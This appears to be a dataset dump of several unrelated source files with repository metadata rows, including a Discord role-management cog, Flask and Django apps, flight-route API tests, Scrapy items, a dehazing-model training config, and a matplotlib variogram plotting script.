brief="{Get a List of All the Roles in the Server}",
usage="rolelist")
@guild_only()
async def _list(self, ctx):
guild = ctx.guild
#Variable for getting roles in guild
rolelist = guild.roles
#Check if there is
#Over 25 roles in the guild
if len(rolelist) > 25:
#Get the length of remaining roles
length = len(rolelist) - 25
role = f"{' • '.join(map(str, (role.mention for role in list(reversed(rolelist))[:20])))} and **{length}** more"
#If there is less than 25 roles
#In the guild
else:
role = f"{' • '.join(map(str, (role.mention for role in list(reversed(rolelist[1:])))))}"
#Check if there is no roles to display
roles = "No Roles" if role == "" else role
#Make and send embed
e = discord.Embed(
title=f"__*Roles in {{{guild.name}}}*__\n**Total {{{len(rolelist)}}}",
description=roles)
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="roleperms",
brief="{Get a List of Perms for a Role}",
usage="roleperms <role>",
aliases=['rolepermission', 'rperms', 'rolepermissions'])
@guild_only()
@bot_has_permissions(use_external_emojis=True)
async def perms(self, ctx, *, role: discord.Role):
#Iterating through list of perms
perms = [f'{perm.title().replace("_", " ")} {("= <:greenmark:738415677827973152>" if value else "= <:redmark:738415723172462723>")}' for perm, value in role.permissions]
#Make and send embed
e = discord.Embed(
color=discord.Color.darker_grey(),
title=f"Permissions for: `{role.name}`",
description="\n\n".join(perms))
            e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@perms.error
async def perms_error(self, ctx, error):
if isinstance(error, BadArgument):
await ctx.send("That isn't a valid role")
@command(
name="createrole",
brief="{Create a New Role}",
usage="createrole <role_name> (color) (reason_for_creating)")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
    async def create(self, ctx, name=None, color: discord.Color=None, *, reason=None):
guild = ctx.guild
if reason is None:
await ctx.send("You need to give a reason for creating this role")
return
if name is None:
await ctx.send("You have to give a name for the role")
return
if name is not None:
#Create the new role
msg = await guild.create_role(name=name, color=color, reason=reason)
await ctx.send(f"{msg.mention} was successfully created")
@command(
name="deleterole",
brief="{Delete a Role}",
usage="deleterole <role>",
aliases=['roledelete', 'rdelete', 'roledel'])
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def delete(self, ctx, *, role: discord.Role):
await role.delete()
await ctx.send(f"{role} was successfully deleted")
def setup(bot):
bot.add_cog(Role(bot))
| [
"[email protected]"
] | |
e1417558af05554d61114f6bc326751d76763e79 | 14dd0b79983ca7f6eddcbfb0fb31a3a001cf5b81 | /airflight/tests/views/api/v1/flight/test_flight.py | a4e618308dc3f54e72bf5732f0f172e0ad624800 | [] | no_license | marcelomoraes28/back-end-take-home | 52de4897189584f3ee8ad86e3a80b7eff972e9a2 | 834eba5a3258efeb8690d2881e90ca3838209fb9 | refs/heads/master | 2020-05-22T02:15:05.334327 | 2019-05-15T22:24:40 | 2019-05-15T22:24:40 | 186,195,227 | 0 | 0 | null | 2019-05-12T00:39:02 | 2019-05-12T00:39:02 | null | UTF-8 | Python | false | false | 2,984 | py | import pytest
from pyramid.testing import DummyRequest
from webob.multidict import MultiDict
from airflight.views.api.v1.flight.exceptions import \
OriginIsTheSameAsTheDestination
class TestAPIFlight:
def test_get_route_without_connections(self, app, data):
"""
Get best route without connections when the airline is United Airlines
"""
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'ANK'), ('destination', 'YYZ')])
get_route = FlightAPI(req).get_best_route()
assert len(get_route['data']) == 1
assert get_route['data'][0]['airline'] == {'name': 'United Airlines',
'2_digit_code': 'UA',
'3_digit_code': 'UAL',
'country': 'United States'}
def test_get_route_with_two_connections(self, app, data):
"""
        Get best route with two connections when the origin airline is
        United Airlines and the connection is Turkish Airlines
"""
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'YWH'), ('destination', 'ANK')])
get_route = FlightAPI(req).get_best_route()
assert len(get_route['data']) == 2
assert get_route['data'][0]['airline'] == {'name': 'United Airlines',
'2_digit_code': 'UA',
'3_digit_code': 'UAL',
'country': 'United States'}
assert get_route['data'][1]['airline'] == {'name': 'Turkish Airlines',
'2_digit_code': 'TK',
'3_digit_code': 'THY',
'country': 'Turkey'}
def test_get_route_when_exist_two_different_routes(self, app, data):
"""
Test when exist different routes
Route 1: (YWH -> YYZ) -> (YYZ -> ANK) -> (ANK -> ADA)
Route 2: (YWH -> ADA)
In this case the system chooses Route 2
"""
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'YWH'), ('destination', 'ADA')])
get_route = FlightAPI(req).get_best_route()
assert len(get_route['data']) == 1
def test_get_route_origin_is_the_same_as_destination(self, app):
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'YWH'), ('destination', 'YWH')])
with pytest.raises(OriginIsTheSameAsTheDestination):
FlightAPI(req).get_best_route()
| [
"[email protected]"
] | |
1b0521829af31e56cc0afc46aa3436c575e25528 | 2002287e40f4fc81a8d8742d6c1e7f11024c9666 | /todo_list/forms.py | 6670d2258ec4871e71c7f176582061323ee82c5c | [] | no_license | wahudong/Practise | 9393827f588632b3daac9d5c5fa53637a9e2e0e9 | 123251153f6e2adfb3ab6e9fbd18db80a54d9541 | refs/heads/main | 2023-01-29T19:55:17.628563 | 2020-12-04T20:41:04 | 2020-12-04T20:41:04 | 318,065,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | from django import forms
from .models import List
from django.forms import ModelForm
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class ListForm(forms.ModelForm):
class Meta:
model = List
fields = ["item", "completed"]
class CreateUserForm(UserCreationForm):
class Meta:
        model = User
fields = ['username','email','password1','password2'] | [
"[email protected]"
] | |
6793830f21ec324ddc11d54d5865424c10430a19 | 6a9b56464bf4e703ebe0039fb12caf7553c94a27 | /jdbook/jdbook/items.py | 586dbf21c31a21bf73aee594deb9517ec86e729e | [] | no_license | paul166/spider | 24136e9578fb5c5e956a27691e5065569c51806c | 6ee3962745183fc73c6efccca66d715db6210c9a | refs/heads/master | 2020-05-19T11:28:42.131481 | 2019-10-25T09:36:30 | 2019-10-25T09:36:30 | 176,266,753 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JdbookItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
b_cate=scrapy.Field()
s_cate = scrapy.Field()
book_img = scrapy.Field()
book_name= scrapy.Field()
book_author= scrapy.Field()
book_press = scrapy.Field()
book_publish_date = scrapy.Field()
book_sku = scrapy.Field()
book_price = scrapy.Field()
s_href = scrapy.Field()
comment = scrapy.Field()
| [
"[email protected]"
] | |
6fb6613372a31c455061abbd06c33ee822e892a9 | aa7622e006b67580cd5c6cc7c337a09dc8018b10 | /main.py | 07bf78ada0c68a77fed23607651ccdea62bdc0c0 | [] | no_license | MatthewMing11/LineAlg | f882a1da7dd2be049f887dc18d4906abfb08321b | d6d4ed972d8173f6bb3d40fb3afb7a32f39a6e5f | refs/heads/master | 2020-08-01T09:36:49.953460 | 2019-02-11T03:43:38 | 2019-02-11T03:43:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | from display import *
from draw import *
screen = new_screen()
color = [ 0, 255, 0 ]
draw_line(250,250,0,0,screen,color)
draw_line(250,250,125,0,screen,color)
draw_line(250,250,250,0, screen,color)
draw_line(250,250,375,0,screen,color)
draw_line(250,250,500,0, screen,color)
draw_line(250,250,500,125,screen,color)
draw_line(250,250,500,250,screen,color)
draw_line(250,250,500,375,screen,color)
draw_line(250,250,500,500, screen,color)
draw_line(250,250,375,500,screen,color)
draw_line(250,250,250,500, screen,color)
draw_line(250,250,125,500,screen,color)
draw_line(250,250,0,500, screen,color)
draw_line(250,250,0,375,screen,color)
draw_line(250,250,0,250, screen,color)
draw_line(250,250,0,125,screen,color)
display(screen)
save_extension(screen, 'img.png')
| [
"[email protected]"
] | |
23c8b4b7b55de70e7470515732522e9c04f0a1bb | a95615ccf6f30a0ba64a2a1f797d6b42c8d8a0f1 | /manage.py | 1024ec5c416012906f668e1469cc10637a800bd4 | [] | no_license | abhishekasana/bitsyurl | 0e89cc856ca587fe5ad39afc83cd2c01176331e5 | 73782082f8714dacaca0411ab311850300f92307 | refs/heads/master | 2021-01-01T12:57:14.893499 | 2020-02-09T11:16:51 | 2020-02-09T11:16:51 | 239,289,147 | 1 | 0 | null | 2020-02-09T11:17:32 | 2020-02-09T10:59:01 | Python | UTF-8 | Python | false | false | 222 | py | from app import app
from flask_script import Manager, Server
manager = Manager(app)
server = Server(host='localhost', port='5000')
manager.add_command("runserver", server)
if __name__ == "__main__":
manager.run()
| [
"[email protected]"
] | |
70adf55e938e2f92c5e112ffa4e627bb586d69d9 | 53bd9c2c8c648069d2c735bba5fc58458e8ad9ea | /little-squid-dehaze/experiments/unet_aod_residual_ntire_config.py | e8438a1cc8b88d995caf8fd6cc38f75554285d7d | [] | no_license | zyh911/image_dehazing | d7842da987e569e015702d0ad7a4861f11a49db6 | 0e6c40f65b7ea27a668af674a30934f5d7bd41ee | refs/heads/master | 2020-04-01T14:42:53.678332 | 2019-06-11T03:55:21 | 2019-06-11T03:55:21 | 153,305,194 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,001 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# changed gpus
import os
import sys
sys.path.insert(0, '../../') # to be changed
# =================== config for train flow ============================================================================
DESC = 'MSE' # to be changed
experiment_name = os.path.splitext(__file__.split('/')[-1])[0]
INDOOR_OR_OUTDOOR_DIR = '/indoor'
# INDOOR_OR_OUTDOOR_DIR = '/outdoor'
PERSONAL_TASKS = '/zyh3/train_tasks' # personal
BASE_ROOT = '/root/group-competition' # base
TRAIN_ROOT = BASE_ROOT + PERSONAL_TASKS + '/' + experiment_name
MODEL_FOLDER = os.path.join(TRAIN_ROOT, 'models')
TRAIN_OUT_FOLDER = os.path.join(TRAIN_ROOT, 'train_out')
PEEK_OUT_FOLDER = os.path.join(TRAIN_ROOT, 'peek_out')
TEST_OUT_FOLDER = os.path.join(TRAIN_ROOT, 'test_out')
DATASET_DIR = BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop'
DATASET_ID = 'aod_txt'
DATASET_TXT_DIR = BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop'
# IMAGE_SITE_URL = 'http://172.16.3.247:8000/image-site/dataset/{dataset_name}?page=1&size=50'
# IMAGE_SITE_DATA_DIR = '/root/zyh3/ITS/ITS/train'
peek_images = [BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop/train/haze/0.png', BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop/train/haze/100.png']
test_input_dir = BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/test/haze'
GPU_ID = None
epochs = 40
batch_size = 32
start_epoch = 1
save_snapshot_interval_epoch = 1
peek_interval_epoch = 1
save_train_hr_interval_epoch = 1
loss_average_win_size = 2
validate_interval_epoch = 1
validate_batch_size = 4
plot_loss_start_epoch = 1
only_validate = False
from visdom import Visdom
vis = Visdom(server='http://127.0.0.1', port=8097)
# =================== config for model and dataset =====================================================================
from squid.data import Photo2PhotoData
from squid.data import RandomCropPhoto2PhotoData
from squid.model import SuperviseModel
import torch
import torch.nn as nn
from squid.loss import VGGLoss
from squid.net import Unet_AOD_Residual_Net
target_net = Unet_AOD_Residual_Net()
target_net = nn.DataParallel(target_net).cuda()
model = SuperviseModel({
'net': target_net,
'optimizer': torch.optim.Adam([{'name':'net_params', 'params':target_net.parameters(), 'base_lr':1e-5}], betas=(0.9, 0.999), weight_decay=0.0005),
'lr_step_ratio': 0.5,
'lr_step_size': 8,
'supervise':{
'out': {'MSE_loss': {'obj': nn.MSELoss(size_average=True), 'factor':1.0, 'weight':1.0}},
},
'metrics': {}
})
train_dataset = Photo2PhotoData({
'data_root': DATASET_DIR,
'desc_file_path': os.path.join(DATASET_TXT_DIR, DATASET_ID, 'train.txt'),
})
valid_dataset = Photo2PhotoData({
'data_root': DATASET_DIR,
'desc_file_path': os.path.join(DATASET_TXT_DIR, DATASET_ID, 'val.txt'),
})
| [
"[email protected]"
] | |
6d61fa26e303c87984b52441d14bccdc9ace0fc9 | f6ab35c3c5f899df0c0ee074de8f8df30227ffe2 | /main/tests/__init__.py | a4a16e0725465c5c924698834a01c2a7b287bdfc | [
"MIT"
] | permissive | josylad/RoomScout | f3614291bbfdd226110e038fb60d593ab3093c7e | a3d067dd67dfdd43702ea2e89064213dbd469157 | refs/heads/master | 2020-12-27T09:22:47.486710 | 2020-02-20T10:18:05 | 2020-02-20T10:18:05 | 237,850,614 | 0 | 0 | MIT | 2020-02-20T10:18:06 | 2020-02-02T23:08:10 | Python | UTF-8 | Python | false | false | 100 | py | import unittest
def suite():
return unittest.TestLoader().discover("main.tests", pattern="*.py")
| [
"[email protected]"
] | |
d64ff73bf99cd86f95dfb7e7e2f1e541175e5a4c | b7f033c9811def6f5097463df86bc2f47c16247a | /app/migrations/0001_initial.py | 301cbbb4ad26635117beeff3d0b5fa8d12cea7ca | [] | no_license | Patton-Burge/django-dog-store | e6effb100f3a3312263bfc6e6f3fc9060d6e0a5a | c92ee19e3d23a7098744e466a2abc415a23ca068 | refs/heads/master | 2020-09-09T16:19:06.211907 | 2019-11-15T21:38:13 | 2019-11-15T21:38:13 | 221,494,695 | 0 | 0 | null | 2019-11-13T15:45:17 | 2019-11-13T15:45:16 | null | UTF-8 | Python | false | false | 1,490 | py | # Generated by Django 2.2.5 on 2019-11-13 16:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DogProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('product_type', models.TextField()),
('dog_size', models.TextField()),
('price', models.FloatField()),
('quantity', models.IntegerField()),
],
),
migrations.CreateModel(
name='DogTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('owner_name', models.TextField()),
('dog_name', models.TextField()),
('dog_birthday', models.DateField()),
],
),
migrations.CreateModel(
name='Purchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('purchased_at', models.DateTimeField()),
('dog_product', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='app.DogProduct')),
],
),
]
| [
"[email protected]"
] | |
26bc93508223d7fcff7aba2d9d230d60e8a72398 | eceeec97c971a3ee8a09dce58d5630a058d9f8cf | /app.py | 5262d7dd487f6b9aee90132b7477219131e02840 | [] | no_license | hamelsmu/hello-world-deploy | a9ffba8c98b1b293946609c99d01db6dede85d4b | d94fd2fb71627f898b2f9496a499451bffca000d | refs/heads/master | 2020-04-14T04:01:23.306727 | 2018-12-31T00:55:53 | 2018-12-31T00:55:53 | 163,623,591 | 2 | 0 | null | 2019-04-14T04:36:41 | 2018-12-30T23:05:03 | Python | UTF-8 | Python | false | false | 210 | py | import os
from flask import Flask, session, render_template, session, redirect, url_for, request
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def index():
return 'hello world deploy!!!' | [
"[email protected]"
] | |
4d51c6e91ba602fe3942d7b108827e8caa5bb051 | 43feb23c11c6e0b8d5dc868cee1deca06067b44e | /read_statistics/utils.py | f0a4f3ae102040c90df743b9644034d480409c7f | [] | no_license | oldestcrab/my_blog_2 | 6c7190571fe2fad70169b36d9159e1daa5aff094 | 47aeb699992c8ca949edae59e2157216c6522a8c | refs/heads/master | 2023-05-01T11:17:55.428536 | 2019-09-29T09:08:02 | 2019-09-29T09:08:02 | 210,355,178 | 0 | 0 | null | 2023-04-21T20:37:59 | 2019-09-23T12:55:48 | Python | UTF-8 | Python | false | false | 3,010 | py | import datetime
from django.contrib.contenttypes.models import ContentType
from .models import ReadNum, ReadNumDetail
from django.utils import timezone
from django.db.models import Sum
from blog.models import Blog
def read_statistics_once_read(request, obj):
"""判断是否需要+1或者创建模型阅读数
:param request: request
:param obj: 模型对象
:return: cookies key,表示已阅读
"""
content_type = ContentType.objects.get_for_model(obj)
    # Build the cookie key
key = f'{content_type.model}_{obj.pk}_read'
    # If the cookie is missing, increment the read count
if not request.COOKIES.get(key):
        # Blog read-count model: increment it, or create it first
readnum, create = ReadNum.objects.get_or_create(content_type=content_type, object_id=obj.pk)
readnum.read_num += 1
readnum.save()
        # Current date
date = timezone.now().date()
        # Detailed read-count model: increment or create today's count for this blog
readNumDetail, create = ReadNumDetail.objects.get_or_create(content_type=content_type, object_id=obj.pk, date=date)
readNumDetail.read_num += 1
readNumDetail.save()
return key
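# Hypothetical usage from a Django view (the view and template names are assumptions,
# not part of this module): the key returned by read_statistics_once_read() must be
# set as a cookie on the response, otherwise every visit is counted again.
#   def blog_detail(request, blog_pk):
#       blog = get_object_or_404(Blog, pk=blog_pk)
#       read_cookie_key = read_statistics_once_read(request, blog)
#       response = render(request, 'blog_detail.html', {'blog': blog})
#       response.set_cookie(read_cookie_key, 'true')  # mark as read for this browser
#       return response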
def get_seven_days_read_data(content_type):
"""获取前七天的相关模型阅读数量
:param content_type: content_type
:return: 前七天的日期,以及前七天的相关模型阅读数量列表
"""
    # Get today's date
today = timezone.now().date()
days = []
read_nums = []
    # Iterate over the previous 7 days
for i in range(7, 0, -1):
day = today - datetime.timedelta(days=i)
days.append(day.strftime('%m/%d'))
result_detail = ReadNumDetail.objects.filter(content_type=content_type, date=day)
        # Total blog read count for that day
result_blog = result_detail.aggregate(read_count=Sum('read_num'))
read_nums.append(result_blog['read_count'] or 0)
return days, read_nums
def get_oneday_hot_blogs(content_type, date):
"""获取某一天的前7篇博客以及当天浏览量
:param content_type: content_type
:param date: 某一天的日期
:return: 某一天的前7篇博客以及当天浏览量
"""
    # Top 7 blogs ranked by read count
today_hot_blogs = ReadNumDetail.objects.filter(content_type=content_type, date=date).order_by('-read_num')[:7]
# print(today_hot_blogs)
return today_hot_blogs
def get_range_day_hot_blogs(days:int):
"""获取前某天范围内的热门博客
:param days: 前几天范围内的热门阅读,前7天:7,当天:0
:return: 前某天范围内的热门博客字典
"""
    # Start date of the window
date = timezone.now().date() - datetime.timedelta(days)
    # Hot blogs queryset
hot_blogs_data = Blog.objects.filter(read_num_details__date__gte=date) \
.values('id', 'title').annotate(read_num_detail=Sum('read_num_details__read_num')).order_by('-read_num_detail')[:7]
return hot_blogs_data | [
"[email protected]"
] | |
f0fac03763cb5c15834f9a17d30425b9cd6f7701 | 05967b90707fdeea9d7ff630ab836b6923def3b4 | /BinarySearch.py | 30ee36c198eed21a882143bc9568e0ea1b4e2ead | [] | no_license | nehavarshney8/Data-Structures-and-Algorithms | 078b474c9761eeac4a8c949c17adc005edc4aaac | 1a49b8d6d0f1e55f742f30313da9ad8fc6585816 | refs/heads/master | 2020-12-21T10:49:10.041503 | 2019-09-04T12:36:12 | 2019-09-04T12:36:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | import math
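# bs() is a recursive binary search over the inclusive index range [low, high].
# It assumes `ls` is sorted in ascending order; it returns the index of `key`,
# or -1 when the key is absent.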
def bs(ls, key, low, high):
if low==high and ls[low]==key:
return low
elif low==high and ls[low]!=key:
return -1
elif high<low:
return -1
else:
mid=math.floor((low+high)/2)
if key==ls[mid]:
return mid
elif key>ls[mid]:
low=mid+1
return bs(ls, key, low, high)
elif key<ls[mid]:
high=mid-1
return bs(ls, key, low, high)
def __main__():
totalElements=input("Enter the total number of elements followed by elements in sequence").split()
ele=totalElements[1:]
seq=[]
for elements in ele:
seq.append(eval(elements))
searchEle=input("Enter the total search elements and elements in order").split()
elem=searchEle[1:]
searchSeq=[]
for elements in elem:
searchSeq.append(eval(elements))
f=[]
for element in searchSeq:
f.append(bs(seq, element, 0, len(seq)-1))
for element in f:
print(element, end=' ')
__main__() | [
"[email protected]"
] | |
9f2cd991b54ae16cb7bfa3a40149fc9e647a39a0 | 7edc9ca35113fc2169828db0cad5b379e0f61813 | /figures/fig_ed5_tinterpcorr_hrdems_smallfonts.py | 6e5efe909a5500d8f41222235c8d9529f286637f | [
"MIT"
] | permissive | LuErShuai/ww_tvol_study | b97a74739fcfbe7d7fb867a6d4fe64df6a125adb | f29fc2fca358aa169f6b7cc790e6b6f9f8b55c6f | refs/heads/main | 2023-05-01T23:05:30.916533 | 2021-05-26T19:41:00 | 2021-05-26T19:41:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,339 | py |
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import scipy.optimize
plt.rcParams.update({'font.size': 5})
plt.rcParams.update({'lines.linewidth':0.35})
plt.rcParams.update({'axes.linewidth':0.35})
plt.rcParams.update({'lines.markersize':2.5})
plt.rcParams.update({'axes.labelpad':1.5})
all_csv = '/home/atom/ongoing/work_worldwide/validation/tcorr/tinterp_corr_deseas_agg_all.csv'
# all_csv = '/home/atom/ongoing/work_worldwide/validation/tinterp_corr_agg_all.csv'
df = pd.read_csv(all_csv)
# df = df[df.reg==5]
cutoffs = list(set(list(df.cutoff)))
dts = sorted(list(set(list(df.nb_dt))))
col = ['tab:orange','tab:blue','tab:olive','tab:red','tab:cyan','tab:brown','tab:gray','tab:pink','tab:purple']
#plot covar by lag
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(df_c.bins.values[1],df_c.exp.values[1],color=col[dts.index(dt)],label=str(dt))
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# elif cutoff == 100000:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# else:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
#
# plt.ylim([0,50])
# plt.xscale('log')
# plt.legend()
#plot covar by dt
dts = sorted(dts)
dts.remove(540.)
dts.remove(900.)
dts.remove(1750.)
dts.remove(2250.)
arr_res = np.zeros((len(dts),7))
arr_count = np.zeros((len(dts),7))
for dt in dts:
df_dt = df[df.nb_dt == dt]
for cutoff in cutoffs:
df_c = df_dt[df_dt.cutoff == cutoff]
if cutoff == 10000:
arr_res[dts.index(dt),0]=np.nanmean(df_c.exp.values[1:2])
arr_count[dts.index(dt),0]=np.nanmean(df_c['count'].values[1:2])
arr_res[dts.index(dt), 1] = np.nanmean(df_c.exp.values[20 - 10:20 + 10])
arr_count[dts.index(dt), 1] = np.nanmean(df_c['count'].values[20 - 10:20 + 10])
arr_res[dts.index(dt), 2] = np.nanmean(df_c.exp.values[50 - 10:50 + 10])
arr_count[dts.index(dt), 2] = np.nanmean(df_c['count'].values[50 - 10:50 + 10])
elif cutoff == 100000:
arr_res[dts.index(dt),3]=np.nanmean(df_c.exp.values[20-5:20+20])
arr_count[dts.index(dt),3]=np.nanmean(df_c['count'].values[20-10:20+10])
arr_res[dts.index(dt),4]=np.nanmean(df_c.exp.values[50-10:50+10])
arr_count[dts.index(dt),4]=np.nanmean(df_c['count'].values[50-10:50+10])
elif cutoff == 1000000:
arr_res[dts.index(dt),5]=np.nanmean(df_c.exp.values[20-10:20+30])
arr_count[dts.index(dt),5]=np.nanmean(df_c['count'].values[20-10:20+30])
arr_res[dts.index(dt),6]=np.nanmean(df_c.exp.values[50-40:50+40])
arr_count[dts.index(dt),6]=np.nanmean(df_c['count'].values[50-40:50+40])
arr_res[arr_count<100]=np.nan
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(dt,df_c.exp.values[1],color=col[0])
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[1])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[2])
# elif cutoff == 100000:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[3])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[4])
# else:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[5])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[6])
fig = plt.figure(figsize=(7.2,7.5))
# plt.subplots_adjust(hspace=0.3)
grid = plt.GridSpec(6, 13, wspace=0.05, hspace=0.5)
ax = fig.add_subplot(grid[:3,:2])
# ax = fig.add_subplot(2, 1, 1)
vario = df[df.nb_dt == 720.]
vec_bins = []
vec_exp = []
vgm1 = vario[vario.cutoff == 10000]
vgm1 = vgm1[vgm1.bins<3000]
for i in range(6):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
# vec_bins += vgm1.bins.tolist()
# vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 100000]
vgm1 = vgm1[np.logical_and(vgm1.bins>3000,vgm1.bins<30000)]
vec_bins += vgm1.bins.tolist()
vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 1000000]
vgm1 = vgm1[vgm1.bins>30000]
for i in range(18):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
vec_bins = np.array(vec_bins)
vec_exp=np.array(vec_exp)
def sph_var(c0,c1,a1,h):
if h < a1:
vgm = c0 + c1 * (3 / 2 * h / a1-1 / 2 * (h / a1) ** 3)
else:
vgm = c0 + c1
return vgm
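# sph_var() is the standard spherical variogram model:
#   gamma(h) = c0 + c1 * (3*h/(2*a1) - h**3/(2*a1**3))  for h < a1,  and  c0 + c1  for h >= a1.
# Summing several of these models with increasing ranges (the a1s below) builds the
# nested spatial correlation structure fitted to the empirical variance points.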
vect = np.array(list(np.arange(0,3000,1)) + list(np.arange(3000,30000,10)) + list(np.arange(30000,3000000,100)))
mod = []
c1s = [0] + list(arr_res[dts.index(720.),:])
a1s = [0.2,2,5,20,50,200]
#find unbiased sills
list_c = []
for j in range(len(a1s)):
print('Range:' + str(a1s[-1 - j]))
c = c1s[-2 - j] - c1s[-3 - j]
print(c)
for k in range(j):
# c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
if j>5:
c -= (sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000) - sph_var(0,list_c[k], a1s[-1-k]*1000,a1s[-2-j]*1000))
elif j==5:
c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
c = max(0, c)
list_c.append(c)
list_c.reverse()
#compute variogram
for i in range(len(vect)):
val = 0
for j in range(len(a1s)):
val += sph_var(0,list_c[j],a1s[j]*1000,vect[i])
mod.append(val)
mod = np.array(mod)
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,3))
ax.set_ylim((0,55))
ax.set_xticks([0,1,2])
ax.text(0.075, 0.975, 'a', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.vlines(0.15,0,60,color=col[0],linewidth=0.5)
ax.text(0.4,c1s[1]-5,'$s_0$',color=col[0],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(2,0,60,color=col[1],linewidth=0.5)
ax.text(2.2,c1s[2]-5,'$s_1$',color=col[1],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.set_ylabel('Variance of elevation differences (m$^2$)')
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[:3,4:6])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,550))
ax.set_ylim((0,55))
ax.set_xticks([0,100,200,300,400,500])
# ax.text(0.075, 0.975, 'C', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(50,0,60,colors=[col[4]],linewidth=0.5)
ax.text(70,c1s[5]-5,'$s_4$',color=col[4],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(200,0,60,colors=[col[5]],linewidth=0.5)
ax.text(220,c1s[6]-7,'$s_5$',color=col[5],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(500,0,60,colors=[col[6]],linewidth=0.5)
ax.text(480,c1s[6]-7,'$s_6$',color=col[6],ha='right',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.tick_params(width=0.35,length=2.5)
ax.set_yticks([])
